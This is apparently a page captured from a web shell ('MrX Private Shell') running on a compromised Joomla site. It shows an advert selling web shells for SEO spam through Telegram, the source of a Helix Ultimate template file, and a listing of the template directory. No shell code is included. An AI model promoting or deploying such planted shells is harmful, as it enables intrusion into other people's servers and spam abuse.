__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package Helix Ultimate Framework
* @author JoomShaper https://www.joomshaper.com
* @copyright Copyright (c) 2010 - 2021 JoomShaper
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or Later
*/
defined ('_JEXEC') or die();
use HelixUltimate\Framework\Core\HelixUltimate;
use HelixUltimate\Framework\Platform\Helper;
use Joomla\CMS\Factory;
use Joomla\CMS\Uri\Uri;
$app = Factory::getApplication();
$this->setHtml5(true);
/**
* Load the framework bootstrap file for enabling the HelixUltimate\Framework namespacing.
*
* @since 2.0.0
*/
$bootstrap_path = JPATH_PLUGINS . '/system/helixultimate/bootstrap.php';
if (file_exists($bootstrap_path))
{
require_once $bootstrap_path;
}
else
{
die('Install and activate <a target="_blank" rel="noopener noreferrer" href="https://www.joomshaper.com/helix">Helix Ultimate Framework</a>.');
}
/**
* Get the theme instance from Helix framework.
*
* @var $theme The theme object from the class HelixUltimate.
* @since 1.0.0
*/
$theme = new HelixUltimate;
$template = Helper::loadTemplateData();
$this->params = $template->params;
$theme_url = Uri::base(true) . '/templates/'. $this->template;
$option = $app->input->get('option', '', 'STRING') ?? "";
$body_class = htmlspecialchars(str_replace('_', '-', $option) ?? "");
$body_class .= ' view-' . htmlspecialchars($app->input->get('view', '', 'STRING') ?? "");
$body_class .= ' layout-' . htmlspecialchars($app->input->get('layout', 'default', 'STRING') ?? "");
$body_class .= ' task-' . htmlspecialchars($app->input->get('task', 'none', 'STRING') ?? "");
/**
* Load the framework bootstrap file for enabling the HelixUltimate\Framework namespacing.
*
* @since 2.0.0
*/
$bootstrap_path = JPATH_PLUGINS . '/system/helixultimate/bootstrap.php';
if (file_exists($bootstrap_path))
{
require_once $bootstrap_path;
}
else
{
die('Install and activate <a target="_blank" rel="noopener noreferrer" href="https://www.joomshaper.com/helix">Helix Ultimate Framework</a>.');
}
/**
* Get the theme instance from Helix framework.
*
* @var $theme The theme object from the class HelixUltimate.
* @since 1.0.0
*/
$theme = new HelixUltimate;
$template = Helper::loadTemplateData();
$this->params = $template->params;
/** Load needed data for javascript */
Helper::flushSettingsDataToJs();
?>
<!doctype html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<?php
$theme->head();
$theme->loadFontAwesome();
?>
</head>
<body class="<?php echo $theme->bodyClass('contentpane'); ?>">
<jdoc:include type="component" />
</body>
</html>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| css | Folder | 0775 |
|
|
| features | Folder | 0775 |
|
|
| fonts | Folder | 0775 |
|
|
| headers | Folder | 0775 |
|
|
| html | Folder | 0775 |
|
|
| images | Folder | 0775 |
|
|
| js | Folder | 0775 |
|
|
| offcanvas | Folder | 0775 |
|
|
| overrides | Folder | 0775 |
|
|
| scss | Folder | 0775 |
|
|
| webfonts | Folder | 0775 |
|
|
| comingsoon.php | File | 748 B | 0664 |
|
| component.php | File | 2.63 KB | 0664 |
|
| error.php | File | 7.92 KB | 0664 |
|
| helper.php | File | 3.36 KB | 0664 |
|
| index.php | File | 0 B | 0664 |
|
| offline.php | File | 2.83 KB | 0664 |
|
| options.json | File | 15.08 KB | 0664 |
|
| options.xml | File | 56.71 KB | 0664 |
|
| templateDetails.xml | File | 3.43 KB | 0664 |
|
| template_preview.png | File | 151.15 KB | 0664 |
|
| template_thumbnail.png | File | 23.82 KB | 0664 |
|